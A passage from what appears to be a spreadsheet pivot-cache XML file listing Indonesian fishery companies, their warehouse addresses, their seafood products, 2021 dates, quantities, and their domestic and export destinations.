    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="24531"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="24532"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="24533"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="24535"/>
    <x v="1045"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24536"/>
    <x v="1045"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24538"/>
    <x v="1045"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demesal Beku (Sebelah, Kerapu, Monkfish, Kakap, Baronang, Seabass)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24539"/>
    <x v="1045"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Makerel, Salem, Sarden)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24540"/>
    <x v="1045"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24541"/>
    <x v="1045"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24544"/>
    <x v="1046"/>
    <s v="PT. CHAMIN JAYA INTERNATIONAL"/>
    <s v="Jl. Raya Cangkir Km 21 No.302G, Kel. Cangkir, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kayu"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="131750"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24545"/>
    <x v="1047"/>
    <s v="CV. BANDAR KARIMUN"/>
    <s v="Jl. Irawan Matress No.18 Batu Lipai, Kel. Baran, Kec. Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Lemuru, Mata Besar, Tongkol, Gabus Laut, Puput, Senangin, Kembung, Talang-talang, Sarden, Selar, Tenggiri)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="170000"/>
    <s v="Kabupaten Karimun"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24546"/>
    <x v="1047"/>
    <s v="CV. BANDAR KARIMUN"/>
    <s v="Jl. Irawan Matress No.18 Batu Lipai, Kel. Baran, Kec. Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Malong, Bawal, Anggoli, Kerapu, Gerot-gerot, Layur, Ungar, Merah, Kakap, Kaci-kaci, Kurau, Parang-parang)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="114000"/>
    <s v="Kabupaten Karimun"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24549"/>
    <x v="1048"/>
    <s v="KOPERASI MINA RIZKI ABADI"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru, Jl. Muara Baru Raya No.30 Blok C7 - C8, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Karawang, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24550"/>
    <x v="1048"/>
    <s v="KOPERASI MINA RIZKI ABADI"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru, Jl. Muara Baru Raya No.30 Blok C7 - C8, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Gulama, Layur, Kakap, Kuro, Alaska Pollock, Sauri Pasifik)"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Tangerang, Kabupaten Serang"/>
    <m/>
  </r>
  <r>
    <n v="24551"/>
    <x v="1048"/>
    <s v="KOPERASI MINA RIZKI ABADI"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru, Jl. Muara Baru Raya No.30 Blok C7 - C8, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tude, Tongkol, Deho, Kembung, Maesang, Layang, Cakalang, Salem)"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Karawang, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Serang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24552"/>
    <x v="1048"/>
    <s v="KOPERASI MINA RIZKI ABADI"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru, Jl. Muara Baru Raya No.30 Blok C7 - C8, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Sukabumi, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24553"/>
    <x v="1049"/>
    <s v="PT. ORIENS PRIMA LESTARI"/>
    <s v="Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Paha Kodok Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Belgium, France"/>
  </r>
  <r>
    <n v="24554"/>
    <x v="1049"/>
    <s v="PT. ORIENS PRIMA LESTARI"/>
    <s v="Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Scallop Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="Belgium, France"/>
  </r>
  <r>
    <n v="24555"/>
    <x v="1049"/>
    <s v="PT. ORIENS PRIMA LESTARI"/>
    <s v="Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="24556"/>
    <x v="1049"/>
    <s v="PT. ORIENS PRIMA LESTARI"/>
    <s v="Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, France"/>
  </r>
  <r>
    <n v="24557"/>
    <x v="1049"/>
    <s v="PT. ORIENS PRIMA LESTARI"/>
    <s v="Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Kerapu, Jengot, Kakap)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="24558"/>
    <x v="1049"/>
    <s v="PT. ORIENS PRIMA LESTARI"/>
    <s v="Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Tongkol, Tembang, Kembung, Tenggiri)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="24559"/>
    <x v="1049"/>
    <s v="PT. ORIENS PRIMA LESTARI"/>
    <s v="Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="24560"/>
    <x v="1050"/>
    <s v="PT. KARYA SEGARINDO PRATAMA"/>
    <s v="Pergudangan 88, Jl. Pesing Poglar No.76A, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Selar, Layang, Cakalang, Benggol, Salem)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24561"/>
    <x v="1050"/>
    <s v="PT. KARYA SEGARINDO PRATAMA"/>
    <s v="Pergudangan 88, Jl. Pesing Poglar No.76A, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Sebelah)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24562"/>
    <x v="727"/>
    <s v="TANG SENG"/>
    <s v="Jl. Wisata Bahari No.8 KM 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2021-05-05T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Barat"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24569"/>
    <x v="1051"/>
    <s v="PT. ANUGERAH SAMUDERA HINDIA"/>
    <s v="Jl. Letjen Gatot Subroto No.106, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="8900000"/>
    <m/>
    <s v="Algeria, Mexico, Portugal, Spain, Thailand"/>
  </r>
  <r>
    <n v="24570"/>
    <x v="1051"/>
    <s v="PT. ANUGERAH SAMUDERA HINDIA"/>
    <s v="Jl. Letjen Gatot Subroto No.106, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Cakalang)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="2500000"/>
    <m/>
    <s v="Philippines, Thailand"/>
  </r>
  <r>
    <n v="24573"/>
    <x v="1052"/>
    <s v="CV. HASIL LAUT NUSANTARA"/>
    <s v="Jl. Lebak Rejo III A No.03 RT 003 RW 006, Kel. Dukuh Setro, Kec. Tambak Sari, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2021-04-08T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="24575"/>
    <x v="938"/>
    <s v="PT. LAUT PANEN RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 305 dan 603, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bogor, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24578"/>
    <x v="755"/>
    <s v="PT, SABINDO RAYA GEMILANG"/>
    <s v="Jl, Gajah Mada No,01 Kompleks TPI Tarakan, Kel, Karang Anyar Pantai, Kec, Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Cephalopoda Beku (Sotong, Gurita)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24579"/>
    <x v="755"/>
    <s v="PT, SABINDO RAYA GEMILANG"/>
    <s v="Jl, Gajah Mada No,01 Kompleks TPI Tarakan, Kel, Karang Anyar Pantai, Kec, Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Demersal Beku (Malong, Layur, Bawal, Perak-perak)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="360000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24580"/>
    <x v="677"/>
    <s v="CV. JAVA FISH"/>
    <s v="Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24581"/>
    <x v="677"/>
    <s v="CV. JAVA FISH"/>
    <s v="Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Segar (Tongkol, Cakalang, Tenggiri)"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24582"/>
    <x v="677"/>
    <s v="CV. JAVA FISH"/>
    <s v="Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Segar"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24583"/>
    <x v="677"/>
    <s v="CV. JAVA FISH"/>
    <s v="Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Segar"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24584"/>
    <x v="1053"/>
    <s v="PT. BANDENG JUWANA"/>
    <s v="Jl. Pandanaran No.57 RT 001 RW 002, Kel. Randusari, Kec. Semarang Selatan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Bandeng Duri Lunak"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="54000"/>
    <s v="Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="24585"/>
    <x v="1054"/>
    <s v="PT. BANDENG JUWANA"/>
    <s v="Kawasan Industri Candi Blok 22A, Jl. Gatot Subroto, Kel. Ngaliyan, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Bandeng Duri Lunak"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="45000"/>
    <s v="Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="24586"/>
    <x v="1055"/>
    <s v="PT. ADIB LABUH INDRALOKA"/>
    <s v="Jl. Raya Perancis Gudang 9 Blok BG - BH Room 1, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Salem, Selayang, Sarden, Tenggiri)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, India, Japan, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="24587"/>
    <x v="1056"/>
    <s v="PT. CELEBES BERKAH NIAGA"/>
    <s v="Pergudangan Logistik Terpadu Pelitagro Blok A No.15, Jl. Ir. Sutami No.24, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Tangerang"/>
    <s v="China, India, Viet Nam"/>
  </r>
  <r>
    <n v="24588"/>
    <x v="1057"/>
    <s v="PT. SAMUDRA PERKASA ABADI"/>
    <s v="Jl. Letjend Gatot Subroto, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="24589"/>
    <x v="651"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Palangka Raya, Kota Banjarmasin, Kota Balikpapan, Kota Samarinda, Kabupaten Wakatobi, Kabupaten Sorong, Kota Sorong"/>
    <s v="American Samoa, Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24590"/>
    <x v="651"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kulit Ikan Kering"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Palangka Raya, Kota Banjarmasin, Kota Balikpapan, Kota Samarinda, Kabupaten Wakatobi, Kabupaten Sorong, Kota Sorong"/>
    <s v="American Samoa, Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24591"/>
    <x v="651"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cacing Laut Kering"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Palangka Raya, Kota Banjarmasin, Kota Balikpapan, Kota Samarinda, Kabupaten Wakatobi, Kabupaten Sorong, Kota Sorong"/>
    <s v="American Samoa, Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24592"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24593"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24594"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Kipas Segar"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24595"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Rajungan Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="3500"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24596"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Demersal Beku (Kerapu)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24597"/>
    <x v="273"/>
    <s v="PT. CAHAYA BINTANG LAUT ABADI"/>
    <s v="Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="135000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24598"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Segar (Teri, Baby Tuna, Tongkol, Lemadang, Layang, Cakalang)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Badung"/>
    <m/>
  </r>
  <r>
    <n v="24599"/>
    <x v="1058"/>
    <s v="CV. MESTA ALAM"/>
    <s v="Jl. Sukomanunggal No.179 Blok F2-F3, Kel. Sukomanunggal, Kec. Sukomanunggal, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
